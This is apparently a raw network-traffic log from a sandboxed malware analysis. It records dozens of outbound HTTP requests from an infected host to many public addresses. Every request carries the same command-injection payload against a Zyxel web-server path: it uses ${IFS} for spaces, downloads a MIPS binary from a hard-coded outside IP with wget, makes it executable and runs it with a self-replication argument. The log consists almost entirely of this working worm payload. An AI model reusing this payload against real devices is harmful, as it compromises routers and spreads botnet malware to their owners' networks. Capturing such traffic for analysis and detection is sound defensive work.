                                                Jan 29, 2024 07:07:50.388680935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4934192.168.2.2355852190.244.47.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388735056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4935192.168.2.2358328178.241.218.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388761044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4936192.168.2.23590541.177.42.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388767958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4937192.168.2.2359452222.227.201.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388807058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4938192.168.2.234378854.249.211.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388834953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4939192.168.2.2333176146.186.240.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388875008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4940192.168.2.2346440153.0.191.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388930082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4941192.168.2.2349338119.141.195.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.388967991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4942192.168.2.234899819.131.211.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389002085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4943192.168.2.2347104174.101.252.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389031887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4944192.168.2.2355930110.111.14.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389092922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4945192.168.2.23542709.90.1.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389113903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4946192.168.2.236059444.206.46.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389163971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4947192.168.2.235841620.128.199.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389194965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4948192.168.2.236041291.75.34.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389229059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4949192.168.2.2340542133.251.141.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389271975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4950192.168.2.235860650.80.144.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389322996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4951192.168.2.2351416204.72.211.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389349937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4952192.168.2.2340156125.86.179.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389408112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4953192.168.2.2341016195.129.174.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389441013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4954192.168.2.2359850212.67.23.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389482021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4955192.168.2.2343296193.253.103.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389519930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4956192.168.2.2339370191.78.163.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389561892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4957192.168.2.2356200170.90.15.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389609098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4958192.168.2.2354640137.164.232.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389628887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4959192.168.2.234062466.234.150.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389693022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4960192.168.2.2336652130.7.182.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389731884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4961192.168.2.236036875.211.200.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389756918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4962192.168.2.235587497.18.209.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389797926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4963192.168.2.235309050.254.55.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389821053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4964192.168.2.233999470.34.47.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389852047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4965192.168.2.2354922179.34.79.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389880896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4966192.168.2.234592271.207.108.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389923096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4967192.168.2.2359790118.168.128.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.389961958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4968192.168.2.2334048181.244.208.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390018940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4969192.168.2.2345312123.62.201.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390054941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4970192.168.2.234858253.252.166.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390094995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4971192.168.2.2359024106.136.159.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390134096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4972192.168.2.2341570114.252.86.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390175104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4973192.168.2.234633061.81.160.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390228987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4974192.168.2.2336074163.229.154.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390256882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4975192.168.2.234082625.183.135.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390311956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4976192.168.2.2337272153.146.238.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390341997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4977192.168.2.233607060.70.33.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390377998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4978192.168.2.2353660108.244.74.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390438080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4979192.168.2.235266640.19.247.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390492916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4980192.168.2.2360518101.230.228.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390528917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4981192.168.2.233414275.74.206.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390563965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4982192.168.2.2347070117.17.2.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390600920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4983192.168.2.2341552167.100.43.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390638113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4984192.168.2.2346594146.206.110.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390671968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4985192.168.2.2347250147.241.140.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390713930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4986192.168.2.2345330151.67.123.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390757084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4987192.168.2.233527427.153.134.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390794992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4988192.168.2.2338562197.41.26.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390826941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4989192.168.2.233776463.138.233.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390856981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4990192.168.2.2332966165.83.236.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390909910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4991192.168.2.235870065.51.17.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390950918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4992192.168.2.2357266166.16.202.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.390969992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4993192.168.2.2348714219.120.212.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.391025066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4994192.168.2.2359774116.135.24.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.391052008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4995192.168.2.235892245.76.39.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.391083002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4996192.168.2.2335320103.169.224.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.391117096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4997192.168.2.233700698.123.51.103443
                                                TimestampBytes transferredDirectionData
